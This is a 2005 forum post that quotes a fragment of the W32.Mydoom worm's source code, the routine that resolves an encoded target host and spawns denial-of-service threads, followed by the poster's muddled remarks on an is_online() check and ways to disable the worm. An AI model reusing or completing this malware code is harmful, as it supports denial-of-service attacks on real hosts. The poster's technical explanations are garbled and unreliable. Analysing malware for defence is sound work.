-
July 11th, 2005, 05:58 AM
#1
W32.Mydoom maybe a bug...
This a bit escene of "My else Doom" source code:
void scodos_main(void)
{
struct hostent *h;
struct sockaddr_in addr;
int i;
unsigned long tid;
char buf[128];
rot13(buf, SCO_SITE_ROT13);
for (; {
while (is_online() == 0)
Sleep(32768);
h = gethostbyname(buf);
if (h == NULL) {
Sleep(32768);
continue;
}
memset(&addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
addr.sin_port = htons(SCO_PORT);
break;
}
for (i=1; i<SCODOS_THREADS; i++)
CreateThread(0, 0, scodos_th, (LPVOID)&addr, 0, &tid);
scodos_th(&addr);
}
that piece:
while (is_online() == 0)
Sleep(32768);
why is_online() function is not really check for "connection" that assume the "victim" is connected for two reasons:
1.- is_online() prototype take a if(THREAD_STATUS) check for internet appz!!!
2.- int value requested is always <> 0 that's result in a permanent virus activity
Now
addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
can fixed manually, put a simple C code reserved offset interval. The virus is inactive
Other resource maybe is tracking the 80 port or change the TCP/UDP limit transfer. (the virus not is affected for this action)
at one week i publish my investigation for W32 virus ways:
http://xr.homeunix.net/forum.html
Best Wishes
Az
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|